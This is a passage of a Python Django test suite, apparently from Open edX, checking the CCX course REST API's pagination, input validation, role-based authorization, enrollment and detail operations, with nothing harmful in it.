self.assertEqual(resp.status_code, status.HTTP_200_OK)
self.assertEqual(len(resp.data['results']), num_ccx) # pylint: disable=no-member
# the display_name should be sorted as "Title CCX x", "Title CCX y", "Title CCX z"
for num, ccx in enumerate(resp.data['results']): # pylint: disable=no-member
self.assertEqual(title_str.format(string.ascii_lowercase[-(num_ccx - num)]), ccx['display_name'])
# add sort order desc
url = '{0}&order_by=display_name&sort_order=desc'.format(self.list_url_master_course)
resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
# the only thing I can check is that the display name is in alphabetically reversed order
# in the same way when the field has been updated above, so with the id asc
for num, ccx in enumerate(resp.data['results']): # pylint: disable=no-member
self.assertEqual(title_str.format(string.ascii_lowercase[-(num + 1)]), ccx['display_name'])
@ddt.data(*AUTH_ATTRS)
def test_get_paginated_list(self, auth_attr):
"""
Tests the API to get a paginated list of CCX Courses
"""
# create some ccx courses
num_ccx = 357
for _ in xrange(num_ccx):
self.make_ccx()
page_size = settings.REST_FRAMEWORK.get('PAGE_SIZE', 10)
num_pages = int(math.ceil(num_ccx / float(page_size)))
# get first page
resp = self.client.get(self.list_url_master_course, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
self.assertEqual(resp.data['count'], num_ccx) # pylint: disable=no-member
self.assertEqual(resp.data['num_pages'], num_pages) # pylint: disable=no-member
self.assertEqual(resp.data['current_page'], 1) # pylint: disable=no-member
self.assertEqual(resp.data['start'], 0) # pylint: disable=no-member
self.assertIsNotNone(resp.data['next']) # pylint: disable=no-member
self.assertIsNone(resp.data['previous']) # pylint: disable=no-member
# get a page in the middle
url = '{0}&page=24'.format(self.list_url_master_course)
resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
self.assertEqual(resp.data['count'], num_ccx) # pylint: disable=no-member
self.assertEqual(resp.data['num_pages'], num_pages) # pylint: disable=no-member
self.assertEqual(resp.data['current_page'], 24) # pylint: disable=no-member
self.assertEqual(resp.data['start'], (resp.data['current_page'] - 1) * page_size) # pylint: disable=no-member
self.assertIsNotNone(resp.data['next']) # pylint: disable=no-member
self.assertIsNotNone(resp.data['previous']) # pylint: disable=no-member
# get last page
url = '{0}&page={1}'.format(self.list_url_master_course, num_pages)
resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
self.assertEqual(resp.data['count'], num_ccx) # pylint: disable=no-member
self.assertEqual(resp.data['num_pages'], num_pages) # pylint: disable=no-member
self.assertEqual(resp.data['current_page'], num_pages) # pylint: disable=no-member
self.assertEqual(resp.data['start'], (resp.data['current_page'] - 1) * page_size) # pylint: disable=no-member
self.assertIsNone(resp.data['next']) # pylint: disable=no-member
self.assertIsNotNone(resp.data['previous']) # pylint: disable=no-member
# last page + 1
url = '{0}&page={1}'.format(self.list_url_master_course, num_pages + 1)
resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
@ddt.data(
(
{},
status.HTTP_400_BAD_REQUEST,
'master_course_id_not_provided',
'auth_header_oauth2_provider'
),
(
{},
status.HTTP_400_BAD_REQUEST,
'master_course_id_not_provided',
'auth'
),
(
{'master_course_id': None},
status.HTTP_400_BAD_REQUEST,
'master_course_id_not_provided',
'auth_header_oauth2_provider'
),
(
{'master_course_id': None},
status.HTTP_400_BAD_REQUEST,
'master_course_id_not_provided',
'auth'
),
(
{'master_course_id': ''},
status.HTTP_400_BAD_REQUEST,
'course_id_not_valid',
'auth_header_oauth2_provider'
),
(
{'master_course_id': ''},
status.HTTP_400_BAD_REQUEST,
'course_id_not_valid',
'auth'
),
(
{'master_course_id': 'invalid_master_course_str'},
status.HTTP_400_BAD_REQUEST,
'course_id_not_valid',
'auth'
),
(
{'master_course_id': 'invalid_master_course_str'},
status.HTTP_400_BAD_REQUEST,
'course_id_not_valid',
'auth_header_oauth2_provider'
),
(
{'master_course_id': 'course-v1:org_foo.0+course_bar_0+Run_0'},
status.HTTP_404_NOT_FOUND,
'course_id_does_not_exist',
'auth'
),
(
{'master_course_id': 'course-v1:org_foo.0+course_bar_0+Run_0'},
status.HTTP_404_NOT_FOUND,
'course_id_does_not_exist',
'auth_header_oauth2_provider'
),
)
@ddt.unpack
def test_post_list_wrong_master_course(self, data, expected_http_error, expected_error_string, auth_attr):
"""
Test for various post requests with wrong master course string
"""
# mock the permission class these cases can be tested
mock_class_str = 'openedx.core.lib.api.permissions.IsMasterCourseStaffInstructor.has_permission'
with mock.patch(mock_class_str, autospec=True) as mocked_perm_class:
mocked_perm_class.return_value = True
# case with no master_course_id provided
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(expected_http_error, expected_error_string, resp)
@ddt.data(*AUTH_ATTRS)
def test_post_list_wrong_master_course_special_cases(self, auth_attr):
"""
Same as test_post_list_wrong_master_course,
but different ways to test the wrong master_course_id
"""
# case with ccx not enabled for master_course_id
self.course.enable_ccx = False
self.mstore.update_item(self.course, self.coach.id)
data = {'master_course_id': self.master_course_key_str}
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_403_FORBIDDEN, 'ccx_not_enabled_for_master_course', resp)
self.course.enable_ccx = True
self.mstore.update_item(self.course, self.coach.id)
# case with deprecated master_course_id
with mock.patch('courseware.courses.get_course_by_id', autospec=True) as mocked:
mocked.return_value.id.deprecated = True
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_400_BAD_REQUEST, 'deprecated_master_course_id', resp)
@ddt.data(
(
{},
{
'max_students_allowed': 'missing_field_max_students_allowed',
'display_name': 'missing_field_display_name',
'coach_email': 'missing_field_coach_email'
},
'auth'
),
(
{},
{
'max_students_allowed': 'missing_field_max_students_allowed',
'display_name': 'missing_field_display_name',
'coach_email': 'missing_field_coach_email'
},
'auth_header_oauth2_provider'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title'
},
{
'coach_email': 'missing_field_coach_email'
},
'auth'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title'
},
{
'coach_email': 'missing_field_coach_email'
},
'auth_header_oauth2_provider'
),
(
{
'max_students_allowed': None,
'display_name': None,
'coach_email': None
},
{
'max_students_allowed': 'null_field_max_students_allowed',
'display_name': 'null_field_display_name',
'coach_email': 'null_field_coach_email'
},
'auth'
),
(
{
'max_students_allowed': None,
'display_name': None,
'coach_email': None
},
{
'max_students_allowed': 'null_field_max_students_allowed',
'display_name': 'null_field_display_name',
'coach_email': 'null_field_coach_email'
},
'auth_header_oauth2_provider'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title',
'coach_email': 'this is not an [email protected]'
},
{'coach_email': 'invalid_coach_email'},
'auth'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title',
'coach_email': 'this is not an [email protected]'
},
{'coach_email': 'invalid_coach_email'},
'auth_header_oauth2_provider'
),
(
{
'max_students_allowed': 10,
'display_name': '',
'coach_email': '[email protected]'
},
{'display_name': 'invalid_display_name'},
'auth'
),
(
{
'max_students_allowed': 10,
'display_name': '',
'coach_email': '[email protected]'
},
{'display_name': 'invalid_display_name'},
'auth_header_oauth2_provider'
),
(
{
'max_students_allowed': 'a',
'display_name': 'CCX Title',
'coach_email': '[email protected]'
},
{'max_students_allowed': 'invalid_max_students_allowed'},
'auth'
),
(
{
'max_students_allowed': 'a',
'display_name': 'CCX Title',
'coach_email': '[email protected]'
},
{'max_students_allowed': 'invalid_max_students_allowed'},
'auth_header_oauth2_provider'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title',
'coach_email': '[email protected]',
'course_modules': {'foo': 'bar'}
},
{'course_modules': 'invalid_course_module_list'},
'auth'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title',
'coach_email': '[email protected]',
'course_modules': {'foo': 'bar'}
},
{'course_modules': 'invalid_course_module_list'},
'auth_header_oauth2_provider'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title',
'coach_email': '[email protected]',
'course_modules': 'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_1'
},
{'course_modules': 'invalid_course_module_list'},
'auth'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title',
'coach_email': '[email protected]',
'course_modules': 'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_1'
},
{'course_modules': 'invalid_course_module_list'},
'auth_header_oauth2_provider'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title',
'coach_email': '[email protected]',
'course_modules': ['foo', 'bar']
},
{'course_modules': 'invalid_course_module_keys'},
'auth'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title',
'coach_email': '[email protected]',
'course_modules': ['foo', 'bar']
},
{'course_modules': 'invalid_course_module_keys'},
'auth_header_oauth2_provider'
),
)
@ddt.unpack
def test_post_list_wrong_input_data(self, data, expected_errors, auth_attr):
"""
Test for various post requests with wrong input data
"""
# add the master_course_key_str to the request data
data['master_course_id'] = self.master_course_key_str
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error_fields(expected_errors, resp)
@ddt.data(*AUTH_ATTRS)
def test_post_list_coach_does_not_exist(self, auth_attr):
"""
Specific test for the case when the input data is valid but the coach does not exist.
"""
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Title',
'coach_email': '[email protected]'
}
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_404_NOT_FOUND, 'coach_user_does_not_exist', resp)
@ddt.data(*AUTH_ATTRS)
def test_post_list_wrong_modules(self, auth_attr):
"""
Specific test for the case when the input data is valid but the
course modules do not belong to the master course
"""
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Title',
'coach_email': self.coach.email,
'course_modules': [
'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_foo',
'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_bar'
]
}
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_module_list_not_belonging_to_master_course', resp)
@ddt.data(*AUTH_ATTRS)
def test_post_list_mixed_wrong_and_valid_modules(self, auth_attr):
"""
Specific test for the case when the input data is valid but some of
the course modules do not belong to the master course
"""
modules = self.master_course_chapters[0:1] + ['block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_foo']
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Title',
'coach_email': self.coach.email,
'course_modules': modules
}
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_module_list_not_belonging_to_master_course', resp)
@ddt.data(*AUTH_ATTRS)
def test_post_list(self, auth_attr):
"""
Test the creation of a CCX
"""
outbox = self.get_outbox()
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Test Title',
'coach_email': self.coach.email,
'course_modules': self.master_course_chapters[0:1]
}
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
# check if the response has at least the same data of the request
for key, val in data.iteritems():
self.assertEqual(resp.data.get(key), val) # pylint: disable=no-member
self.assertIn('ccx_course_id', resp.data) # pylint: disable=no-member
# check that the new CCX actually exists
course_key = CourseKey.from_string(resp.data.get('ccx_course_id')) # pylint: disable=no-member
ccx_course = CustomCourseForEdX.objects.get(pk=course_key.ccx)
self.assertEqual(
unicode(CCXLocator.from_course_locator(ccx_course.course.id, ccx_course.id)),
resp.data.get('ccx_course_id') # pylint: disable=no-member
)
# check that the coach user has coach role on the master course
coach_role_on_master_course = CourseCcxCoachRole(self.master_course_key)
self.assertTrue(coach_role_on_master_course.has_user(self.coach))
# check that the coach has been enrolled in the ccx
ccx_course_object = courses.get_course_by_id(course_key)
self.assertTrue(
CourseEnrollment.objects.filter(course_id=ccx_course_object.id, user=self.coach).exists()
)
# check that an email has been sent to the coach
self.assertEqual(len(outbox), 1)
self.assertIn(self.coach.email, outbox[0].recipients()) # pylint: disable=no-member
@ddt.data(
('auth', True),
('auth', False),
('auth_header_oauth2_provider', True),
('auth_header_oauth2_provider', False)
)
@ddt.unpack
def test_post_list_on_active_state(self, auth_attr, user_is_active):
"""
Test the creation of a CCX on user's active states.
"""
self.app_user.is_active = user_is_active
self.app_user.save() # pylint: disable=no-member
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Test Title',
'coach_email': self.coach.email,
'course_modules': self.master_course_chapters[0:1]
}
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
if not user_is_active:
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
else:
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
@ddt.data(*AUTH_ATTRS)
def test_post_list_duplicated_modules(self, auth_attr):
"""
Test the creation of a CCX, but with duplicated modules
"""
chapters = self.master_course_chapters[0:1]
duplicated_chapters = chapters * 3
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Test Title',
'coach_email': self.coach.email,
'course_modules': duplicated_chapters
}
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
self.assertEqual(resp.data.get('course_modules'), chapters) # pylint: disable=no-member
@ddt.data(*AUTH_ATTRS)
def test_post_list_staff_master_course_in_ccx(self, auth_attr):
"""
Specific test to check that the staff and instructor of the master
course are assigned to the CCX.
"""
outbox = self.get_outbox()
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Test Title',
'coach_email': self.coach.email
}
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
# check that only one email has been sent and it is to to the coach
self.assertEqual(len(outbox), 1)
self.assertIn(self.coach.email, outbox[0].recipients()) # pylint: disable=no-member
list_staff_master_course = list_with_level(self.course, 'staff')
list_instructor_master_course = list_with_level(self.course, 'instructor')
course_key = CourseKey.from_string(resp.data.get('ccx_course_id')) # pylint: disable=no-member
with ccx_course_cm(course_key) as course_ccx:
list_staff_ccx_course = list_with_level(course_ccx, 'staff')
list_instructor_ccx_course = list_with_level(course_ccx, 'instructor')
# The "Coach" in the parent course becomes "Staff" on the CCX, so the CCX should have 1 "Staff"
# user more than the parent course
self.assertEqual(len(list_staff_master_course) + 1, len(list_staff_ccx_course))
# Make sure all of the existing course staff are passed to the CCX
for course_user in list_staff_master_course:
self.assertIn(course_user, list_staff_ccx_course)
# Make sure the "Coach" on the parent course is "Staff" on the CCX
self.assertIn(self.coach, list_staff_ccx_course)
self.assertEqual(len(list_instructor_master_course), len(list_instructor_ccx_course))
for course_user, ccx_user in izip(sorted(list_instructor_master_course), sorted(list_instructor_ccx_course)):
self.assertEqual(course_user, ccx_user)
@attr(shard=1)
@ddt.ddt
class CcxDetailTest(CcxRestApiTest):
"""
Test for the CCX REST APIs
"""
ENABLED_SIGNALS = ['course_published']
def setUp(self):
"""
Set up tests
"""
super(CcxDetailTest, self).setUp()
self.make_coach()
# create a ccx
self.ccx = self.make_ccx(max_students_allowed=123)
self.ccx_key = CCXLocator.from_course_locator(self.ccx.course.id, self.ccx.id)
self.ccx_key_str = unicode(self.ccx_key)
self.detail_url = reverse('ccx_api:v0:ccx:detail', kwargs={'ccx_course_id': self.ccx_key_str})
def make_ccx(self, max_students_allowed=200):
"""
Overridden method to replicate (part of) the actual
creation of ccx courses
"""
ccx = super(CcxDetailTest, self).make_ccx(max_students_allowed=max_students_allowed)
ccx.structure_json = json.dumps(self.master_course_chapters)
ccx.save()
override_field_for_ccx(ccx, self.course, 'start', now())
override_field_for_ccx(ccx, self.course, 'due', None)
# Hide anything that can show up in the schedule
hidden = 'visible_to_staff_only'
for chapter in self.course.get_children():
override_field_for_ccx(ccx, chapter, hidden, True)
for sequential in chapter.get_children():
override_field_for_ccx(ccx, sequential, hidden, True)
for vertical in sequential.get_children():
override_field_for_ccx(ccx, vertical, hidden, True)
# enroll the coach in the CCX
ccx_course_key = CCXLocator.from_course_locator(self.course.id, ccx.id)
email_params = get_email_params(
self.course,
auto_enroll=True,
course_key=ccx_course_key,
display_name=ccx.display_name
)
enroll_email(
course_id=ccx_course_key,
student_email=self.coach.email,
auto_enroll=True,
email_students=False,
email_params=email_params,
)
return ccx
@ddt.data(*AUTH_ATTRS)
def test_authorization(self, auth_attr):
"""
Test that only the right token is authorized
"""
auth_list = [
"Wrong token-type-obviously",
"Bearer wrong token format",
"Bearer wrong-token",
"Bearer",
"Bearer hfbhfbfwq398248fnid939rh3489fh39nd4m34r9" # made up token
]
# all the auths in the list fail to authorize
for auth in auth_list:
resp = self.client.get(self.detail_url, {}, HTTP_AUTHORIZATION=auth)
self.assertEqual(resp.status_code, status.HTTP_401_UNAUTHORIZED)
resp = self.client.get(self.detail_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
def test_authorization_no_oauth_staff(self):
"""
Check authorization for staff users logged in without oauth
"""
# create a staff user
staff_user = User.objects.create_user('test_staff_user', '[email protected]', 'test')
# add staff role to the staff user
CourseStaffRole(self.master_course_key).add_users(staff_user)
data = {'display_name': 'CCX Title'}
# the staff user can perform the request
self.client.login(username=staff_user.username, password=USER_PASSWORD)
resp = self.client.get(self.detail_url)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
resp = self.client.patch(self.detail_url, data, format='json')
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
def test_authorization_no_oauth_instructor(self):
"""
Check authorization for users logged in without oauth
"""
# create an instructor user
instructor_user = User.objects.create_user('test_instructor_user', '[email protected]', 'test')
# add instructor role to the instructor user
CourseInstructorRole(self.master_course_key).add_users(instructor_user)
data = {'display_name': 'CCX Title'}
# the instructor user can perform the request
self.client.login(username=instructor_user.username, password=USER_PASSWORD)
resp = self.client.get(self.detail_url)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
resp = self.client.patch(self.detail_url, data, format='json')
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
def test_authorization_no_oauth_other_coach(self):
"""
Check authorization for other coach users logged in without oauth
"""
# create an coach user
coach_user = User.objects.create_user('test_coach_user', '[email protected]', 'test')
# add coach role to the coach user
CourseCcxCoachRole(self.master_course_key).add_users(coach_user)
data = {'display_name': 'CCX Title'}
# the coach user cannot perform the request: this type of user can only get her own CCX
self.client.login(username=coach_user.username, password=USER_PASSWORD)
resp = self.client.get(self.detail_url)
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
resp = self.client.patch(self.detail_url, data, format='json')
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
def test_authorization_no_oauth_ccx_coach(self):
"""
Check authorization for ccx coach users logged in without oauth
"""
data = {'display_name': 'CCX Title'}
# the coach owner of the CCX can perform the request only if it is a get
self.client.login(username=self.coach.username, password=USER_PASSWORD)
resp = self.client.get(self.detail_url)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
resp = self.client.patch(self.detail_url, data, format='json')
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
def test_resolve_get_detail(self):
"""
Test for the ccx detail view resolver. This is needed because it is assumed
that only an URL with a valid course id string can reach the detail view.
"""
# get the base url from the valid one to build invalid urls
base_url = '{0}/'.format(self.detail_url.rsplit('/', 1)[0])
# this url should be the same of the ccx list view
resolver = resolve(base_url)
self.assertEqual(views.CCXListView.__name__, resolver.func.__name__)
self.assertEqual(views.CCXListView.__module__, resolver.func.__module__)
# invalid urls
for invalid_ccx_id in ('foo', 'ccx-v1:org.0', 'ccx-v1:org.0+course_0'):
with self.assertRaises(Resolver404):
resolve('{0}{1}'.format(base_url, invalid_ccx_id))
# the following course ID works even if it is not a CCX valid course id (the regex matches course ID strings)
resolver = resolve('{0}{1}'.format(base_url, 'ccx-v1:org.0+course_0+Run_0'))
self.assertEqual(views.CCXDetailView.__name__, resolver.func.__name__)
self.assertEqual(views.CCXDetailView.__module__, resolver.func.__module__)
# and of course a valid ccx course id
resolver = resolve('{0}{1}'.format(base_url, self.ccx_key_str))
self.assertEqual(views.CCXDetailView.__name__, resolver.func.__name__)
self.assertEqual(views.CCXDetailView.__module__, resolver.func.__module__)
@ddt.data(
('get', AUTH_ATTRS[0]),
('get', AUTH_ATTRS[1]),
('delete', AUTH_ATTRS[0]),
('delete', AUTH_ATTRS[1]),
('patch', AUTH_ATTRS[0]),
('patch', AUTH_ATTRS[1])
)
@ddt.unpack
def test_detail_wrong_ccx(self, http_method, auth_attr):
"""
Test for different methods for detail of a ccx course.
All check the validity of the ccx course id
"""
client_request = getattr(self.client, http_method)
# get a detail url with a master_course id string
mock_class_str = 'openedx.core.lib.api.permissions.IsCourseStaffInstructor.has_object_permission'
url = reverse('ccx_api:v0:ccx:detail', kwargs={'ccx_course_id': self.master_course_key_str})
# the permission class will give a 403 error because will not find the CCX
resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
# bypassing the permission class we get another kind of error
with mock.patch(mock_class_str, autospec=True) as mocked_perm_class:
mocked_perm_class.return_value = True
resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_id_not_valid_ccx_id', resp)
# use an non existing ccx id
url = reverse('ccx_api:v0:ccx:detail', kwargs={'ccx_course_id': 'ccx-v1:foo.0+course_bar_0+Run_0+ccx@1'})
# the permission class will give a 403 error because will not find the CCX
resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
# bypassing the permission class we get another kind of error
with mock.patch(mock_class_str, autospec=True) as mocked_perm_class:
mocked_perm_class.return_value = True
resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_404_NOT_FOUND, 'ccx_course_id_does_not_exist', resp)
# get a valid ccx key and add few 0s to get a non existing ccx for a valid course
ccx_key_str = '{0}000000'.format(self.ccx_key_str)
url = reverse('ccx_api:v0:ccx:detail', kwargs={'ccx_course_id': ccx_key_str})
# the permission class will give a 403 error because will not find the CCX
resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
# bypassing the permission class we get another kind of error
with mock.patch(mock_class_str, autospec=True) as mocked_perm_class:
mocked_perm_class.return_value = True
resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_404_NOT_FOUND, 'ccx_course_id_does_not_exist', resp)
@ddt.data(*AUTH_ATTRS)
def test_get_detail(self, auth_attr):
"""
Test for getting detail of a ccx course
"""
resp = self.client.get(self.detail_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
self.assertEqual(resp.data.get('ccx_course_id'), self.ccx_key_str) # pylint: disable=no-member
self.assertEqual(resp.data.get('display_name'), self.ccx.display_name) # pylint: disable=no-member
self.assertEqual(
resp.data.get('max_students_allowed'), # pylint: disable=no-member
self.ccx.max_student_enrollments_allowed # pylint: disable=no-member
)
self.assertEqual(resp.data.get('coach_email'), self.ccx.coach.email) # pylint: disable=no-member
self.assertEqual(resp.data.get('master_course_id'), unicode(self.ccx.course_id)) # pylint: disable=no-member
self.assertItemsEqual(resp.data.get('course_modules'), self.master_course_chapters) # pylint: disable=no-member
@ddt.data(*AUTH_ATTRS)
def test_delete_detail(self, auth_attr):
"""
Test for deleting a ccx course
"""
# check that there are overrides
self.assertGreater(CcxFieldOverride.objects.filter(ccx=self.ccx).count(), 0)
self.assertGreater(CourseEnrollment.objects.filter(course_id=self.ccx_key).count(), 0)
resp = self.client.delete(self.detail_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
self.assertIsNone(resp.data) # pylint: disable=no-member
# the CCX does not exist any more
with self.assertRaises(CustomCourseForEdX.DoesNotExist):
CustomCourseForEdX.objects.get(id=self.ccx.id)
# check that there are no overrides
self.assertEqual(CcxFieldOverride.objects.filter(ccx=self.ccx).count(), 0)
self.assertEqual(CourseEnrollment.objects.filter(course_id=self.ccx_key).count(), 0)
@ddt.data(*AUTH_ATTRS)
def test_patch_detail_change_master_course(self, auth_attr):
"""
Test to patch a ccx course to change a master course
"""
data = {
'master_course_id': 'changed_course_id'
}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_403_FORBIDDEN, 'master_course_id_change_not_allowed', resp)
@ddt.data(
(
{
'max_students_allowed': None,
'display_name': None,
'coach_email': None
},
{
'max_students_allowed': 'null_field_max_students_allowed',
'display_name': 'null_field_display_name',
'coach_email': 'null_field_coach_email'
},
AUTH_ATTRS[0]
),
(
{
'max_students_allowed': None,
'display_name': None,
'coach_email': None
},
{
'max_students_allowed': 'null_field_max_students_allowed',
'display_name': 'null_field_display_name',
'coach_email': 'null_field_coach_email'
},
AUTH_ATTRS[1]
),
(
{'coach_email': 'this is not an [email protected]'},
{'coach_email': 'invalid_coach_email'},
AUTH_ATTRS[0]
),
(
{'coach_email': 'this is not an [email protected]'},
{'coach_email': 'invalid_coach_email'},
AUTH_ATTRS[1]
),
(
{'display_name': ''},
{'display_name': 'invalid_display_name'},
AUTH_ATTRS[0]
),
(
{'display_name': ''},
{'display_name': 'invalid_display_name'},
AUTH_ATTRS[1]
),
(
{'max_students_allowed': 'a'},
{'max_students_allowed': 'invalid_max_students_allowed'},
AUTH_ATTRS[0]
),
(
{'max_students_allowed': 'a'},
{'max_students_allowed': 'invalid_max_students_allowed'},
AUTH_ATTRS[1]
),
(
{'course_modules': {'foo': 'bar'}},
{'course_modules': 'invalid_course_module_list'},
AUTH_ATTRS[0]
),
(
{'course_modules': {'foo': 'bar'}},
{'course_modules': 'invalid_course_module_list'},
AUTH_ATTRS[1]
),
(
{'course_modules': 'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_1'},
{'course_modules': 'invalid_course_module_list'},
AUTH_ATTRS[0]
),
(
{'course_modules': 'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_1'},
{'course_modules': 'invalid_course_module_list'},
AUTH_ATTRS[1]
),
(
{'course_modules': ['foo', 'bar']},
{'course_modules': 'invalid_course_module_keys'},
AUTH_ATTRS[0]
),
(
{'course_modules': ['foo', 'bar']},
{'course_modules': 'invalid_course_module_keys'},
AUTH_ATTRS[1]
),
)
@ddt.unpack
def test_patch_detail_wrong_input_data(self, data, expected_errors, auth_attr):
"""
Test for different wrong inputs for the patch method
"""
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error_fields(expected_errors, resp)
@ddt.data(*AUTH_ATTRS)
def test_empty_patch(self, auth_attr):
"""
An empty patch does not modify anything
"""
display_name = self.ccx.display_name
max_students_allowed = self.ccx.max_student_enrollments_allowed # pylint: disable=no-member
coach_email = self.ccx.coach.email # pylint: disable=no-member
ccx_structure = self.ccx.structure # pylint: disable=no-member
resp = self.client.patch(self.detail_url, {}, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
ccx = CustomCourseForEdX.objects.get(id=self.ccx.id)
self.assertEqual(display_name, ccx.display_name)
self.assertEqual(max_students_allowed, ccx.max_student_enrollments_allowed)
self.assertEqual(coach_email, ccx.coach.email)
self.assertEqual(ccx_structure, ccx.structure)
@ddt.data(*AUTH_ATTRS)
def test_patch_detail_coach_does_not_exist(self, auth_attr):
"""
Specific test for the case when the input data is valid but the coach does not exist.
"""
data = {
'max_students_allowed': 111,
'display_name': 'CCX Title',
'coach_email': '[email protected]'
}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_404_NOT_FOUND, 'coach_user_does_not_exist', resp)
@ddt.data(*AUTH_ATTRS)
def test_patch_detail_wrong_modules(self, auth_attr):
"""
Specific test for the case when the input data is valid but the
course modules do not belong to the master course
"""
data = {
'course_modules': [
'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_foo',
'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_bar'
]
}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_module_list_not_belonging_to_master_course', resp)
@ddt.data(*AUTH_ATTRS)
def test_patch_detail_mixed_wrong_and_valid_modules(self, auth_attr):
"""
Specific test for the case when the input data is valid but some of
the course modules do not belong to the master course
"""
modules = self.master_course_chapters[0:1] + ['block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_foo']
data = {
'course_modules': modules
}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
